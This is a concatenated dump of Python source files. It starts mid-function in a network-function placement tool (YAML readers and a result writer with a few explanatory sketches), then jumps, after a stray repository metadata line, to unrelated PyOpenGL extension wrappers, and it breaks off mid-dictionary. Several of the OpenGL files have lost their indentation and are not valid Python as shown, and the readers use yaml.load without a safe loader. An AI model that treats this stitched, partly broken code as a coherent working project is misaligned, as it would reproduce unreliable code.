        component = Component(vnf["name"], vnf["type"], vnf["stateful"], inputs, outputs, vnf["cpu"], vnf["mem"], outgoing, vnf_delay, config=vnf_image)
        components.append(component)

    for arc in template["vlinks"]:
        source = list(filter(lambda x: x.name == arc["src"], components))[0]  # get the component with the specified name
        dest = list(filter(lambda x: x.name == arc["dest"], components))[0]
        arc = Arc(arc["direction"], source, arc["src_output"], dest, arc["dest_input"], arc["max_delay"])
        arcs.append(arc)

    template = Template(template["name"], components, arcs)
    update_stateful(template)

    if return_src_components:
        source_components = {j for j in components if j.source}
        return template, source_components

    return template


# read sources from a yaml list
def read_sources(yaml_file, source_components):
    sources = []
    # with open(file, "r") as sources_file:
    #     yaml_file = yaml.load(sources_file)
    #
    # # special case: no sources
    # if yaml_file is None:
    #     return sources
    for src in yaml_file:
        # get the component with the specified name: first (and only) element with the source name
        try:
            component = list(filter(lambda x: x.name == src["vnf"], source_components))[0]
            if not component.source:
                raise ValueError("Component {} is not a source component (required).".format(component))
        except IndexError:
            raise ValueError("Component {} of source unknown (not used in any template).".format(src["vnf"]))

        # read flows
        flows = []
        for f in src["flows"]:
            flows.append(Flow(f["id"], f["data_rate"]))  # explicit float cast necessary for dr?
        sources.append(Source(src["node"], component, flows))
    return sources


# read fixed instances from a yaml file
def read_fixed_instances(file, components):
    fixed_instances = []
    with open(file, "r") as stream:
        fixed = yaml.load(stream)
    for i in fixed:
        # get the component with the specified name: first (and only) element with the component name
        try:
            component = list(filter(lambda x: x.name == i["vnf"], components))[0]
            if component.source:
                raise ValueError("Component {} is a source component (forbidden).".format(component))
        except IndexError:
            raise ValueError("Component {} of fixed instance unknown (not used in any template).".format(i["vnf"]))
        fixed_instances.append(FixedInstance(i["node"], component))
    return fixed_instances


# read the previous embedding from a yaml file
def read_prev_embedding(file, templates):
    # create empty overlays for all templates
    prev_embedding = {}  # dict: template -> overlay
    for t in templates:
        prev_embedding[t] = Overlay(t, [], [])

    with open(file, "r") as f:
        yaml_file = yaml.load(f)

    # read and create the VNF instances of the previous embedding
    for vnf in yaml_file["placement"]["vnfs"]:
        # find the component that matches the VNF name (in any of the templates)
        for t in templates:
            # use the first matching component (assuming it's only in one template)
            if vnf["name"] in [c.name for c in t.components]:
                component = list(filter(lambda x: x.name == vnf["name"], t.components))[0]
                # add a new instance to the overlay of the corresponding template (source components need src_flows to be set)
                if component.source:
                    prev_embedding[t].instances.append(Instance(component, vnf["node"], src_flows=[]))
                else:
                    prev_embedding[t].instances.append(Instance(component, vnf["node"]))
                break

    # TODO: read and create flows; otherwise, adding edges doesn't really make a difference in the heuristic
    # read and create the edges of the previous embedding
    for edge in yaml_file["placement"]["vlinks"]:
        instances = [i for ol in prev_embedding.values() for i in ol.instances]
        # try to get the source and dest instance from the list of instances
        try:
            source = list(filter(lambda x: x.component.name == edge["src_vnf"] and x.location == edge["src_node"], instances))[0]
            dest = list(filter(lambda x: x.component.name == edge["dest_vnf"] and x.location == edge["dest_node"], instances))[0]
        # if the vnfs don't exist in prev_embedding (e.g., through incorrect input), ignore the edge
        except IndexError:
            print("No matching VNFs in prev_embedding for edge from {} to {}. Ignoring the edge.".format(edge["src_vnf"], edge["dest_vnf"]))
            continue  # skip and continue with the next edge

        # get the arc from the templates by matching against the source and dest components
        for t in templates:
            if source.component in t.components and dest.component in t.components:
                # assume t has an arc source->dest if both components are in t
                arc = list(filter(lambda x: x.source == source.component and x.dest == dest.component, t.arcs))[0]
                # add the new edge to the overlay of the corresponding template
                prev_embedding[t].edges.append(Edge(arc, source, dest))

    return prev_embedding
```
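`read_network` derives each link delay purely from node coordinates: geographic distance divided by the speed of light, scaled by a propagation factor and rounded like in the emulator. Below is a standalone sketch of that calculation; note that `vincenty` is no longer available in recent geopy releases, so the sketch uses `geodesic` as a stand-in, and the coordinates are made up:

```python
# Standalone sketch of the delay formula used in read_network (assumes geopy >= 2.0).
from geopy.distance import geodesic
import numpy as np

SPEED_OF_LIGHT = 299792458    # meter per second
PROPAGATION_FACTOR = 0.77     # signals propagate slower than light in vacuum

node_a = (51.7190, 8.7575)    # hypothetical node positions (lat, long)
node_b = (52.5200, 13.4050)

distance = geodesic(node_a, node_b).meters
delay_ms = distance / SPEED_OF_LIGHT * 1000 * PROPAGATION_FACTOR
print(int(np.around(delay_ms)))  # ~1 ms for roughly 330 km
```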
#### File: bjointsp/read_write/writer.py
```python
import os
import yaml
from collections import defaultdict
from datetime import datetime
import bjointsp.objective as objective
from bjointsp.heuristic import shortest_paths as sp
import bjointsp.read_write.store as store
import networkx as nx
import uuid
import json


# prepare the result file based on the scenario files: in a results subdirectory, using the scenario name + timestamp (+ seed + event)
# heuristic results also add the seed and event number; MIP results can add the repetition instead
def create_result_file(input_files, subfolder, seed=None, seed_subfolder=False, obj=None):
    file_name = ''
    # add the basename of each input file to the output filename
    for f in input_files:
        if f is not None:
            file_name += os.path.basename(f).split('.')[0] + '-'

    # put the result into a seed subfolder
    if seed is not None and seed_subfolder:
        result_directory = os.path.join('results/' + subfolder + '/{}'.format(seed))
    else:
        result_directory = os.path.join('results/' + subfolder)

    # add the seed to the result name
    if seed is None:
        seed = ''
    else:
        seed = '_{}'.format(seed)

    timestamp = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
    result_file = file_name + timestamp + seed + '.yaml'
    result_path = os.path.join(result_directory, result_file)
    os.makedirs(os.path.dirname(result_path), exist_ok=True)  # create subdirectories if necessary
    return result_path


# calculate the end-to-end delay for every flow
def save_end2end_delay(edges, links):
    flow_delays = {}
    for edge in edges:
        for flow in edge.flows:
            if flow.id not in flow_delays:
                flow_delays[flow.id] = 0
            # add the vnf_delay of the destination
            flow_delays[flow.id] += edge.dest.component.vnf_delay
            # add the path delay; all paths of an edge are shortest paths with the same delay, so just use the one at index 0
            flow_delays[flow.id] += sp.path_delay(links, edge.paths[0])
    return flow_delays


def format_output(result, changed_instances, overlays, nodes, links):
    instances, edges = set(), set()
    for ol in overlays:
        instances.update(ol.instances)
        edges.update(ol.edges)

    # save placement
    result['placement'] = {'vnfs': [], 'vlinks': []}
    result['metrics'] = {}
    for i in instances:
        vnf = {'name': i.component.name, 'node': i.location}
        result['placement']['vnfs'].append(vnf)
    result['metrics']['num_instances'] = len(result['placement']['vnfs'])
    for e in edges:
        vlink = {'src_vnf': e.source.component.name, 'src_node': e.source.location,
                 'dest_vnf': e.dest.component.name, 'dest_node': e.dest.location}
        result['placement']['vlinks'].append(vlink)

    # node capacity violations
    result['placement']['cpu_oversub'] = []
    result['placement']['mem_oversub'] = []
    max_cpu, max_mem = 0, 0
    for v in nodes.ids:
        over_cpu = sum(i.consumed_cpu() for i in instances if i.location == v) - nodes.cpu[v]
        if over_cpu > 0:
            result['placement']['cpu_oversub'].append({'node': v})
            if over_cpu > max_cpu:
                max_cpu = over_cpu
        over_mem = sum(i.consumed_mem() for i in instances if i.location == v) - nodes.mem[v]
        if over_mem > 0:
            result['placement']['mem_oversub'].append({'node': v})
            if over_mem > max_mem:
                max_mem = over_mem
    result['metrics']['max_cpu_oversub'] = max_cpu
    result['metrics']['max_mem_oversub'] = max_mem

    # consumed node resources
    result['placement']['alloc_node_res'] = []
    for i in instances:
        resources = {'name': i.component.name, 'node': i.location, 'cpu': i.consumed_cpu(), 'mem': i.consumed_mem()}
        result['placement']['alloc_node_res'].append(resources)

    # changed instances (compared to the previous embedding)
    result['metrics']['changed'] = []
    for i in changed_instances:
        result['metrics']['changed'].append({'name': i.component.name, 'node': i.location})
    result['metrics']['num_changed'] = len(result['metrics']['changed'])

    # edge and link data rate, used links
    result['placement']['flows'] = []
    result['metrics']['path_delays'] = []
    result['metrics']['vnf_delays'] = []
    result['metrics']['total_path_delay'] = 0
    result['metrics']['total_vnf_delay'] = 0
    result['metrics']['max_endToEnd_delay'] = 0
    result['metrics']['total_delay'] = 0
    result['placement']['links'] = []
    consumed_dr = defaultdict(int)  # default = 0
    for e in edges:
        for f in e.flows:
            flow = {'arc': str(e.arc), 'src_node': e.source.location, 'dst_node': e.dest.location,
                    'src_vnf': e.source.component.name, 'dest_vnf': e.dest.component.name, 'flow_id': f.id}
            result['placement']['flows'].append(flow)
        for path in e.paths:
            # record the edge delay: all flows take the same (shortest) path => use the path delay
            path_delay = {'src': e.arc.source.name, 'dest': e.arc.dest.name, 'src_node': e.source.location,
                          'dest_node': e.dest.location, 'path_delay': sp.path_delay(links, path)}
            result['metrics']['path_delays'].append(path_delay)
            result['metrics']['total_path_delay'] += sp.path_delay(links, path)
            result['metrics']['total_delay'] += sp.path_delay(links, path)
            # go through the nodes of each path and increase the dr of the traversed links
            for i in range(len(path) - 1):
                # skip connections on the same node (no link used)
                if path[i] != path[i + 1]:
                    consumed_dr[(path[i], path[i + 1])] += e.flow_dr() / len(e.paths)
                    link = {'arc': str(e.arc), 'edge_src': e.source.location, 'edge_dst': e.dest.location,
                            'link_src': path[i], 'link_dst': path[i + 1]}
                    result['placement']['links'].append(link)

    # record VNF delays
    for i in instances:
        vnf_delay = {'vnf': i.component.name, 'vnf_delay': i.component.vnf_delay}
        result['metrics']['vnf_delays'].append(vnf_delay)
        result['metrics']['total_vnf_delay'] += i.component.vnf_delay

    # record total delay = link delay + vnf delay
    result['metrics']['total_delay'] = result['metrics']['total_path_delay'] + result['metrics']['total_vnf_delay']

    # record the max end-to-end delay
    endToEnd = save_end2end_delay(edges, links)
    if endToEnd:
        result['metrics']['max_endToEnd_delay'] = max(endToEnd.values())
    # for an empty placement, there is no end-to-end delay
    else:
        result['metrics']['max_endToEnd_delay'] = 0

    # link capacity violations
    result['placement']['dr_oversub'] = []
    max_dr = 0
    for l in links.ids:
        if links.dr[l] < consumed_dr[l]:
            result['placement']['dr_oversub'].append({'link': l})
            if consumed_dr[l] - links.dr[l] > max_dr:
                max_dr = consumed_dr[l] - links.dr[l]
    result['metrics']['max_dr_oversub'] = max_dr

    result['id'] = str(uuid.uuid4())
    store.store_placement_result(result)
    return result['id']


# add variable values to the result dictionary
def save_heuristic_variables(result, changed_instances, instances, edges, nodes, links):
    # save placement
    result['placement'] = {'vnfs': [], 'vlinks': []}
    for i in instances:
        vnf = {'name': i.component.name, 'node': i.location, 'image': i.component.config}
        result['placement']['vnfs'].append(vnf)
    result['metrics']['num_instances'] = len(result['placement']['vnfs'])
    for e in edges:
        vlink = {'src_vnf': e.source.component.name, 'src_node': e.source.location,
                 'dest_vnf': e.dest.component.name, 'dest_node': e.dest.location}
        result['placement']['vlinks'].append(vlink)

    # node capacity violations
    result['placement']['cpu_oversub'] = []
    result['placement']['mem_oversub'] = []
    max_cpu, max_mem = 0, 0
    for v in nodes.ids:
        over_cpu = sum(i.consumed_cpu() for i in instances if i.location == v) - nodes.cpu[v]
        if over_cpu > 0:
            result['placement']['cpu_oversub'].append({'node': v})
            if over_cpu > max_cpu:
                max_cpu = over_cpu
        over_mem = sum(i.consumed_mem() for i in instances if i.location == v) - nodes.mem[v]
        if over_mem > 0:
            result['placement']['mem_oversub'].append({'node': v})
            if over_mem > max_mem:
                max_mem = over_mem
    result['metrics']['max_cpu_oversub'] = max_cpu
    result['metrics']['max_mem_oversub'] = max_mem

    # consumed node resources
    result['placement']['alloc_node_res'] = []
    for i in instances:
        resources = {'name': i.component.name, 'node': i.location, 'cpu': i.consumed_cpu(), 'mem': i.consumed_mem()}
        result['placement']['alloc_node_res'].append(resources)

    # changed instances (compared to the previous embedding)
    result['metrics']['changed'] = []
    for i in changed_instances:
        result['metrics']['changed'].append({'name': i.component.name, 'node': i.location})
    result['metrics']['num_changed'] = len(result['metrics']['changed'])

    # edge and link data rate, used links
    result['placement']['flows'] = []
    result['metrics']['path_delays'] = []
    result['metrics']['vnf_delays'] = []
    result['metrics']['total_path_delay'] = 0
    result['metrics']['total_vnf_delay'] = 0
    result['metrics']['max_endToEnd_delay'] = 0
    result['metrics']['total_delay'] = 0
    result['placement']['links'] = []
    consumed_dr = defaultdict(int)  # default = 0
    for e in edges:
        for f in e.flows:
            flow = {'arc': str(e.arc), 'src_node': e.source.location, 'dst_node': e.dest.location,
                    'src_vnf': e.source.component.name, 'dest_vnf': e.dest.component.name, 'flow_id': f.id}
            result['placement']['flows'].append(flow)
        for path in e.paths:
            # record the edge delay: all flows take the same (shortest) path => use the path delay
            path_delay = {'src': e.arc.source.name, 'dest': e.arc.dest.name, 'src_node': e.source.location,
                          'dest_node': e.dest.location, 'path_delay': sp.path_delay(links, path)}
            result['metrics']['path_delays'].append(path_delay)
            result['metrics']['total_path_delay'] += sp.path_delay(links, path)
            result['metrics']['total_delay'] += sp.path_delay(links, path)
            # go through the nodes of each path and increase the dr of the traversed links
            for i in range(len(path) - 1):
                # skip connections on the same node (no link used)
                if path[i] != path[i + 1]:
                    consumed_dr[(path[i], path[i + 1])] += e.flow_dr() / len(e.paths)
                    link = {'arc': str(e.arc), 'edge_src': e.source.location, 'edge_dst': e.dest.location,
                            'link_src': path[i], 'link_dst': path[i + 1]}
                    result['placement']['links'].append(link)

    # record VNF delays
    for i in instances:
        vnf_delay = {'vnf': i.component.name, 'vnf_delay': i.component.vnf_delay}
        result['metrics']['vnf_delays'].append(vnf_delay)
        result['metrics']['total_vnf_delay'] += i.component.vnf_delay

    # record total delay = link delay + vnf delay
    result['metrics']['total_delay'] = result['metrics']['total_path_delay'] + result['metrics']['total_vnf_delay']

    # record the max end-to-end delay
    endToEnd = save_end2end_delay(edges, links)
    if endToEnd:
        result['metrics']['max_endToEnd_delay'] = max(endToEnd.values())
    # for an empty placement, there is no end-to-end delay
    else:
        result['metrics']['max_endToEnd_delay'] = 0

    # link capacity violations
    result['placement']['dr_oversub'] = []
    max_dr = 0
    for l in links.ids:
        if links.dr[l] < consumed_dr[l]:
            result['placement']['dr_oversub'].append({'link': l})
            if consumed_dr[l] - links.dr[l] > max_dr:
                max_dr = consumed_dr[l] - links.dr[l]
    result['metrics']['max_dr_oversub'] = max_dr

    return result


def write_heuristic_result(runtime, obj_value, changed, overlays, input_files, obj, nodes, links, seed, seed_subfolder):
    result_file = create_result_file(input_files, 'bjointsp', seed=seed, seed_subfolder=seed_subfolder, obj=obj)

    instances, edges = set(), set()
    for ol in overlays:
        instances.update(ol.instances)
        edges.update(ol.edges)

    # construct the result as a dictionary for writing into the YAML result file
    # result = {'time': datetime.now().strftime('%Y-%m-%d_%H-%M-%S'),
    #           'input': {'network': os.path.basename(input_files[0]),
    #                     'service': os.path.basename(input_files[1]),
    #                     'sources': os.path.basename(input_files[2]),
    #                     'fixed': 'None',
    #                     'prev_embedding': 'None',
    #                     'seed': seed,
    #                     'algorithm': 'bjointsp',
    #                     'objective': obj},
    #           'metrics': {'runtime': runtime,
    #                       'obj_value': obj_value}}
    result = {'time': datetime.now().strftime('%Y-%m-%d_%H-%M-%S'),
              'input': {'network': os.path.basename(input_files[0]),
                        'service': os.path.basename(input_files[1]),
                        'sources': '',
                        'fixed': 'None',
                        'prev_embedding': 'None',
                        'seed': seed,
                        'algorithm': 'bjointsp',
                        'objective': obj},
              'metrics': {'runtime': runtime,
                          'obj_value': obj_value}}

    # set the file of fixed instances and of the previous embedding if they are specified
    if input_files[3] is not None:
        result['input']['fixed'] = os.path.basename(input_files[3])
    if input_files[4] is not None:
        result['input']['prev_embedding'] = os.path.basename(input_files[4])

    # add input details to simplify evaluation: network size, etc.
    network = nx.read_graphml(input_files[0])
    result['input']['num_nodes'] = network.number_of_nodes()
    result['input']['num_edges'] = network.number_of_edges()
    with open(input_files[1]) as f:
        # service = yaml.load(f, yaml.SafeLoader)
        service = json.load(f)
        result['input']['num_vnfs'] = len(service['vnfs'])
    # with open(input_files[2]) as f:
    #     sources = yaml.load(f, yaml.SafeLoader)
    sources = None
    if sources is None:
        sources = []
    result['input']['num_sources'] = len(sources)

    result = save_heuristic_variables(result, changed, instances, edges, nodes, links)

    with open(result_file, 'w', newline='') as outfile:
        yaml.dump(result, outfile, default_flow_style=False)
    print('Writing solution to {}'.format(result_file))
    return result_file
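
# For orientation, a hypothetical example of the naming scheme implemented in
# create_result_file (all values below are made up):
#   input_files = ['abilene.graphml', 'web-service.json', None, None, None],
#   subfolder='bjointsp', seed=42, seed_subfolder=False
# would yield a path like
#   results/bjointsp/abilene-web-service-2021-03-01_12-30-05_42.yaml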
```
{
  "source": "5gconnectedbike/Navio2",
  "score": 2
}
#### File: GL/AMD/gpu_shader_int64.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.AMD.gpu_shader_int64 import *
from OpenGL.raw.GL.AMD.gpu_shader_int64 import _EXTENSION_NAME
def glInitGpuShaderInt64AMD():
    '''Return boolean indicating whether this extension is available'''
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glUniform1i64vNV.value size not checked against count
glUniform1i64vNV=wrapper.wrapper(glUniform1i64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform2i64vNV.value size not checked against count*2
glUniform2i64vNV=wrapper.wrapper(glUniform2i64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform3i64vNV.value size not checked against count*3
glUniform3i64vNV=wrapper.wrapper(glUniform3i64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform4i64vNV.value size not checked against count*4
glUniform4i64vNV=wrapper.wrapper(glUniform4i64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform1ui64vNV.value size not checked against count
glUniform1ui64vNV=wrapper.wrapper(glUniform1ui64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform2ui64vNV.value size not checked against count*2
glUniform2ui64vNV=wrapper.wrapper(glUniform2ui64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform3ui64vNV.value size not checked against count*3
glUniform3ui64vNV=wrapper.wrapper(glUniform3ui64vNV).setInputArraySize(
'value', None
)
# INPUT glUniform4ui64vNV.value size not checked against count*4
glUniform4ui64vNV=wrapper.wrapper(glUniform4ui64vNV).setInputArraySize(
'value', None
)
# OUTPUT glGetUniformi64vNV.params COMPSIZE(program, location)
# OUTPUT glGetUniformui64vNV.params COMPSIZE(program, location)
# INPUT glProgramUniform1i64vNV.value size not checked against count
glProgramUniform1i64vNV=wrapper.wrapper(glProgramUniform1i64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform2i64vNV.value size not checked against count*2
glProgramUniform2i64vNV=wrapper.wrapper(glProgramUniform2i64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform3i64vNV.value size not checked against count*3
glProgramUniform3i64vNV=wrapper.wrapper(glProgramUniform3i64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform4i64vNV.value size not checked against count*4
glProgramUniform4i64vNV=wrapper.wrapper(glProgramUniform4i64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform1ui64vNV.value size not checked against count
glProgramUniform1ui64vNV=wrapper.wrapper(glProgramUniform1ui64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform2ui64vNV.value size not checked against count*2
glProgramUniform2ui64vNV=wrapper.wrapper(glProgramUniform2ui64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform3ui64vNV.value size not checked against count*3
glProgramUniform3ui64vNV=wrapper.wrapper(glProgramUniform3ui64vNV).setInputArraySize(
'value', None
)
# INPUT glProgramUniform4ui64vNV.value size not checked against count*4
glProgramUniform4ui64vNV=wrapper.wrapper(glProgramUniform4ui64vNV).setInputArraySize(
'value', None
)
### END AUTOGENERATED SECTION
```
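The wrappers above mainly relax array-size checking, so the `*i64vNV` uniform setters accept plain Python sequences. A hedged usage sketch follows; it assumes a current GL context, a linked program object passed in by the caller, and a made-up uniform name:

```python
# Minimal sketch, not taken from the PyOpenGL docs; the uniform name is hypothetical.
from OpenGL.GL import glGetUniformLocation, glUseProgram
from OpenGL.GL.AMD.gpu_shader_int64 import glInitGpuShaderInt64AMD, glUniform1i64vNV


def set_int64_counters(program, values):
    """Upload a small int64 uniform array to the (hypothetical) u_counters uniform."""
    if not glInitGpuShaderInt64AMD():
        raise RuntimeError("GL_AMD_gpu_shader_int64 not available")
    glUseProgram(program)
    loc = glGetUniformLocation(program, b"u_counters")
    # count followed by the values; the wrapper converts the Python list for us
    glUniform1i64vNV(loc, len(values), values)
```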
#### File: GL/ARB/derivative_control.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.derivative_control import *
from OpenGL.raw.GL.ARB.derivative_control import _EXTENSION_NAME
def glInitDerivativeControlARB():
    '''Return boolean indicating whether this extension is available'''
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/ES2_compatibility.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.ES2_compatibility import *
from OpenGL.raw.GL.ARB.ES2_compatibility import _EXTENSION_NAME
def glInitEs2CompatibilityARB():
    '''Return boolean indicating whether this extension is available'''
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glShaderBinary.binary size not checked against length
# INPUT glShaderBinary.shaders size not checked against count
glShaderBinary=wrapper.wrapper(glShaderBinary).setInputArraySize(
'binary', None
).setInputArraySize(
'shaders', None
)
glGetShaderPrecisionFormat=wrapper.wrapper(glGetShaderPrecisionFormat).setOutput(
'precision',size=(1,),orPassIn=True
).setOutput(
'range',size=(2,),orPassIn=True
)
### END AUTOGENERATED SECTION
from OpenGL import lazywrapper as _lazywrapper
from OpenGL.arrays import GLintArray
@_lazywrapper.lazy( glGetShaderPrecisionFormat )
def glGetShaderPrecisionFormat(baseOperation, shadertype, precisiontype, range=None, precision=None):
    """Provides range and precision if not provided, returns (range,precision)"""
    if range is None:
        range = GLintArray.zeros( (2,) )
    if precision is None:
        precision = GLintArray.zeros( (2,) )
    baseOperation( shadertype, precisiontype, range, precision )
    return range, precision
```
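The lazy wrapper above lets callers omit the output arrays: it allocates them and returns `(range, precision)` directly. A brief sketch of how it might be called, assuming a current GL context:

```python
# Sketch: query the range/precision of mediump floats in fragment shaders.
# Requires a current GL context; exact values depend on the driver.
from OpenGL.GL import GL_FRAGMENT_SHADER
from OpenGL.GL.ARB.ES2_compatibility import GL_MEDIUM_FLOAT, glGetShaderPrecisionFormat

range_, precision = glGetShaderPrecisionFormat(GL_FRAGMENT_SHADER, GL_MEDIUM_FLOAT)
print(range_, precision)  # e.g. exponent range and number of precision bits
```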
#### File: GL/ARB/framebuffer_object.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.framebuffer_object import *
from OpenGL.raw.GL.ARB.framebuffer_object import _EXTENSION_NAME
def glInitFramebufferObjectARB():
    '''Return boolean indicating whether this extension is available'''
    from OpenGL import extensions
    return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glDeleteRenderbuffers.renderbuffers size not checked against n
glDeleteRenderbuffers=wrapper.wrapper(glDeleteRenderbuffers).setInputArraySize(
'renderbuffers', None
)
glGenRenderbuffers=wrapper.wrapper(glGenRenderbuffers).setOutput(
'renderbuffers',size=lambda x:(x,),pnameArg='n',orPassIn=True
)
glGetRenderbufferParameteriv=wrapper.wrapper(glGetRenderbufferParameteriv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
# INPUT glDeleteFramebuffers.framebuffers size not checked against n
glDeleteFramebuffers=wrapper.wrapper(glDeleteFramebuffers).setInputArraySize(
'framebuffers', None
)
glGenFramebuffers=wrapper.wrapper(glGenFramebuffers).setOutput(
'framebuffers',size=lambda x:(x,),pnameArg='n',orPassIn=True
)
glGetFramebufferAttachmentParameteriv=wrapper.wrapper(glGetFramebufferAttachmentParameteriv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
### END AUTOGENERATED SECTION
from OpenGL.lazywrapper import lazy as _lazy
@_lazy( glDeleteFramebuffers )
def glDeleteFramebuffers( baseOperation, n, framebuffers=None ):
"""glDeleteFramebuffers( framebuffers ) -> None
"""
if framebuffers is None:
framebuffers = arrays.GLuintArray.asArray( n )
n = arrays.GLuintArray.arraySize( framebuffers )
return baseOperation( n, framebuffers )
# Setup the GL_UNSIGNED_INT_24_8 image type
from OpenGL import images
from OpenGL.raw.GL.VERSION.GL_1_1 import GL_UNSIGNED_INT
images.TYPE_TO_ARRAYTYPE[ GL_UNSIGNED_INT_24_8 ] = GL_UNSIGNED_INT
images.TIGHT_PACK_FORMATS[ GL_UNSIGNED_INT_24_8 ] = 4
# The extensions actually use the _EXT forms, which is a bit confusing
# for users, IMO.
GL_FRAMEBUFFER_INCOMPLETE_DIMENSIONS = constant.Constant( 'GL_FRAMEBUFFER_INCOMPLETE_DIMENSIONS', 0x8CD9 )
GL_FRAMEBUFFER_INCOMPLETE_FORMATS = constant.Constant( 'GL_FRAMEBUFFER_INCOMPLETE_FORMATS', 0x8CDA )
GL_FRAMEBUFFER_UNSUPPORTED = constant.Constant( 'GL_FRAMEBUFFER_UNSUPPORTED', 0x8CDD )
del images
del GL_UNSIGNED_INT
```
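A short usage sketch of the wrappers above, assuming a current OpenGL context (context creation is not shown); it only illustrates how the output wrapper and the lazy glDeleteFramebuffers wrapper simplify the call signatures:
```python
# Sketch only: requires a live OpenGL context created elsewhere.
from OpenGL.GL.ARB.framebuffer_object import glGenFramebuffers, glDeleteFramebuffers

# The output wrapper allocates the result array from 'n', so the generated
# framebuffer names are returned directly.
fbos = glGenFramebuffers(2)

# The lazy wrapper derives 'n' from the array when only the array is passed.
glDeleteFramebuffers(fbos)
```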
#### File: GL/ARB/pipeline_statistics_query.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.pipeline_statistics_query import *
from OpenGL.raw.GL.ARB.pipeline_statistics_query import _EXTENSION_NAME
def glInitPipelineStatisticsQueryARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/post_depth_coverage.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.post_depth_coverage import *
from OpenGL.raw.GL.ARB.post_depth_coverage import _EXTENSION_NAME
def glInitPostDepthCoverageARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/program_interface_query.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.program_interface_query import *
from OpenGL.raw.GL.ARB.program_interface_query import _EXTENSION_NAME
def glInitProgramInterfaceQueryARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
glGetProgramInterfaceiv=wrapper.wrapper(glGetProgramInterfaceiv).setOutput(
'params',size=_glgets._glget_size_mapping,pnameArg='pname',orPassIn=True
)
# INPUT glGetProgramResourceIndex.name size not checked against 'name'
glGetProgramResourceIndex=wrapper.wrapper(glGetProgramResourceIndex).setInputArraySize(
'name', None
)
glGetProgramResourceName=wrapper.wrapper(glGetProgramResourceName).setOutput(
'length',size=(1,),orPassIn=True
).setOutput(
'name',size=lambda x:(x,),pnameArg='bufSize',orPassIn=True
)
# INPUT glGetProgramResourceiv.props size not checked against propCount
glGetProgramResourceiv=wrapper.wrapper(glGetProgramResourceiv).setOutput(
'length',size=(1,),orPassIn=True
).setOutput(
'params',size=lambda x:(x,),pnameArg='bufSize',orPassIn=True
).setInputArraySize(
'props', None
)
# INPUT glGetProgramResourceLocation.name size not checked against 'name'
glGetProgramResourceLocation=wrapper.wrapper(glGetProgramResourceLocation).setInputArraySize(
'name', None
)
# INPUT glGetProgramResourceLocationIndex.name size not checked against 'name'
glGetProgramResourceLocationIndex=wrapper.wrapper(glGetProgramResourceLocationIndex).setInputArraySize(
'name', None
)
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/shader_clock.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.shader_clock import *
from OpenGL.raw.GL.ARB.shader_clock import _EXTENSION_NAME
def glInitShaderClockARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/ARB/texture_rg.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.texture_rg import *
from OpenGL.raw.GL.ARB.texture_rg import _EXTENSION_NAME
def glInitTextureRgARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
from OpenGL import images as _images
_images.COMPONENT_COUNTS.update( {
GL_R16:1,
GL_R16F:1,
GL_R16I:1,
GL_R16UI:1,
GL_R32F:1,
GL_R32I:1,
GL_R32UI:1,
GL_R8:1,
GL_R8I:1,
GL_R8UI:1,
GL_RG:2,
GL_RG16:2,
GL_RG16F:2,
GL_RG16I:2,
GL_RG16UI:2,
GL_RG32F:2,
GL_RG32I:2,
GL_RG32UI:2,
GL_RG8:2,
GL_RG8I:2,
GL_RG8UI:2,
